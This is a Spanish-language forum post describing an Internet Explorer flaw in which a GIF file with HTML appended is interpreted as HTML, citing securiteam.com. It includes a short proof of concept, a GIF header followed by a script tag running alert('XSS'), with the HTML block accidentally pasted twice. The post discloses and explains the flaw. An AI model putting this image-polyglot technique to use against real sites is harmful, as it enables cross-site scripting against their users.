Autor
Tal parece que el Internet Explorer pondria todos los datos(marco del HTML y contenido incluido) en un solo esquema. Éste, luego trata de interpretarlo. Pero, no puede determinar el principio y el extremo verdadero de un archivo incluido. El contenido de ésos - no esperado de cualquier manera - se maneja como código del HTML también.
Pero se parece que otros archivos que se podrían incluir en un archivo HTML podrian ser ,e.g. JPG, WAV, AVI, RM/RAM.
Prueba de Concepto:
Código:
01 <GIF89aŸ 8 ÷™fÿ™™>
02 <html>
03 <head>
04 <script>
05 alert("XSS");
06 </script>
07 </head>
08 <body>
09 </body>
10 </html>
02 <html>
03 <head>
04 <script>
05 alert("XSS");
06 </script>
07 </head>
08 <body>
09 </body>
10 </html>
Como se puede ver en la linea 01 se encuentra el codigo del GIF; pero de la 02 a la 10 el codigo HTML y el Script.
Fuente:securiteam.com
Salu2
En línea
) no aqui.. en otro foro jeje.
